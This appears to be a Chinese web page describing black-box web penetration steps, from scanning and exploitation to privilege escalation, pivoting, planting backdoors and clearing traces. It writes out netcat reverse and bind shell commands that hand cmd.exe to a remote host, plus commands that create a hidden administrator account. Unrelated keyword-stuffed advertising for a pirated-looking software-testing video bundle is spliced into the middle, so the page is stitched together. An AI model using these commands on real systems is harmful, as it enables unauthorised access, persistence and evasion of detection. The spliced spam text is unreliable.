web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp 4444
在内网主机上执行:
nc-e cmd.exe 公网主机ip4444
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p 4444 -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip4444
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
web渗透测试是如何进行的?
这个是通过多方面的渗透测试进行的,比如说服务器渗透测试、应用层测试等,具体的网堤安全可以解答。
python自动化教程Jmeter性能测试
python自动化教程Jmeter性能测试25套高级软件测试,性能测试,功能测试,自动化测试,接口测试,移动端测试,手机测试,WEB测试,渗透测试,测试用例设计,黑盒测试,白盒测试,UFT高级测试,Android测试,Selenium3自动化测试,Python3 测试,Java接口测试项目实战视频教程
软件测试技术包含:性能测试,功能测试,自动化测试,接口测试,移动端测试,手机测试,WEB测试,渗透测试,测试用例设计,黑盒测试,白盒测试,UFT高级测试,项目实战,Android测试,Selenium3自动化测试,Python3 测试,Java接口测试,LoadRunner性能测试,Appiumapp自动化测试,UIAutomator,Appium,Unittest测试框架,Kali Linux Web渗透测试,Git+Jenkins持续集成,LR+Jmeter性能测试,分布式性能测试高级视频教程。。。
Dodwnload:
总目录:25套高级软件测试,性能测试,功能测试,自动化测试,接口测试,移动端测试,手机测试,WEB测试,渗透测试,测试用例设计,黑盒测试,白盒测试,目实战视频教程
第一套:【基础精通】软件测试特训营基础到就业班,系统测试,WEB测试,UFT与Selenium自动化测试,LR性能测试视频教程
第二套:【项目实战】软件测试系列之Java Selenium3自动化测试项目实战视频教程
第三套:【微服务课】Spring Cloud微服务最新技术入门到精通视频教程
第四套:【系统学习】Android移动端自动化测试从入门到实战(Java篇)UIAutomator,Robotium,Appium实战进阶视频教程
第五套:【系统学习】Android移动端专项测试与自动化测试(Python篇)UIAutomator,Appium,Unittest框架视频教程
第六套:【性能测试】JMeter深入进阶性能测试体系,接口性能测试,各领域企业实战视频教程
第七套:【项目实战】JMeter全程实战、性能测试实战、分布式性能测试、真实案例分析、基础到精通视频教程
第八套:【性能测试】LoadRunner性能测试基础到精通全程实战视频教程
第九套:【渗透测试】Kali Linux Web渗透测试视频教程
第十套:【系统学习】Appiumapp自动化测试基础到精通视频教程
第十一套:【项目实战】python selenium自动化测试项目实战视频教程(3套)
第十二套:【系统学习】快速上手JMeter性能测试工具视频教程
第十三套:【系统学习】LoadRunner软件性能测试,接口性能测试视频教程
第十四套:【项目实战】Selenium3.0深度解析自动化测试框架设计与实战与平台设计高级测试开发实战视频教程
第十五套:【系统学习】Web自动化测试,Selenium基础到企业应用,用例设计,持续集成视频教程
第十六套:【项目实战】最全面的Java接口自动化测试实战视频教程
第十七套:【项目实战】Python接口自动化从设计到开发,测试框架实战与自动化进阶视频教程
第十八套:【系统学习】达内软件测试零基础到就业视频教程
第十九套:【测试就业】软件测试就业指导视频教程
第二十套:【安卓测试】Android安卓自动化新手进阶测试培训手机app软件开发课
第二十一套:【系统学习】软件测试特训营,自动化测试与UFT应用视频教程
第二十二套:【高新面试】Python高新面试教程移动自动化测试面试面试分析+知识理论+面试技巧视频教程
第二十三套:【高级测试】最新Web自动化测试框架Selenium3.0+Python3,搭建通用的Web自动化测试框架实战视频教程
第二十四套:【高级测试】高级软件测试工程师精英培训班,软件测试工程师(Web自动化+APP自动化+接口自动化+面试)视频教程
第二十五套:【系统学习】软件测试web自动化测试selenium+移动端项目测试appium+接口测试Jmeter+性能测试LoadRunner视频教程
python自动化教程Jmeter性能测试python自动化教程Jmeter性能测试python自动化教程Jmeter性能测试python自动化教程Jmeter性能测试python自动化教程Jmeter性能测试python自动化教程Jmeter性能测试python自动化教程Jmeter性能测试python自动化教程Jmeter性能测试python自动化教程Jmeter性能测试
什么是wed渗透测试
应该说的是web渗透测试吧。
web就是网站、网站的应用这个层次的。
也就是主要是用于测试网站的安全性的一种安全检测。
0条大神的评论